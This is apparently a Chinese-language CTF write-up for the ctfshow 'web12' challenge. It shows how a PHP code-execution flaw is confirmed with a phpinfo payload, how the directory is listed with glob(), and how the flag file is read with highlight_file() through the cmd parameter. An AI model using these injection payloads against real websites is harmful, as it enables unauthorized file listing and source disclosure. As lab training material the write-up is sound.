当前位置: 首页 > news >正文

ctfshow WEB web12

news 来源:原创 2025/5/25 17:18:44

发现只有这样一句话,应该是要看页面源代码的,右键查看页面源代码

发现可能存在代码执行漏洞,拼接一个?cmd=phpinfo();

成功显示出php信息, 说明存在代码执行漏洞

接下来遍历目录,我们要用到一个函数 glob()

glob() 函数可以查找文件, 返回一个文件数组, 常配合通配符来遍历目录

?cmd=print_r(glob('*'));

盲猜这个名字特殊的文件里面就有flag,根据提示,要用到高亮函数 highlight

highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件中。

?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

发现了 flag

相关文章:

  • 【力扣05】最长回文子串
  • Transformer 分布式训练代码
  • 蓝队技能-Web入侵-入口查杀攻击链
  • 系统设计思维的讨论
  • 常见的后缀名
  • 第九天 开始Unity Shader的学习之单张纹理
  • 指针数组 vs 数组指针
  • MCP结合高德地图完成配置
  • dify windos,linux下载安装部署,提供百度云盘地址
  • SQL:Normalization(范式化)
  • 豪越赋能消防安全管控,解锁一体化内管“安全密码”
  • 07_Z-Stack多节点组网及终端消息上报
  • 《Python星球日记》第26天:Matplotlib 可视化
  • SEER: Self-Aligned Evidence Extraction for Retrieval-AugmentedGeneration
  • SQL 查询中涉及的表及其作用说明
  • docker compose方式安装ClickHouse数据库
  • 工会考试重点内容有哪些:核心考点与备考指南
  • 软考-数据库系统工程师(15万词+400张图片)(一)
  • SFM/MVS_NERF_3DGAUSS三维重建
  • linux内核升级
  • dw做网站 如何设置转动/热门推广软件
  • 网站框架设计图/上海网上推广
  • 长春网站建设论坛/互联网营销师怎么报名
  • 做网站挣钱快吗/北京百度公司地址在哪里
  • 网站开发 报价/seo推广关键词公司
  • 河南省住房和城乡建设厅二维码网站/快速排名教程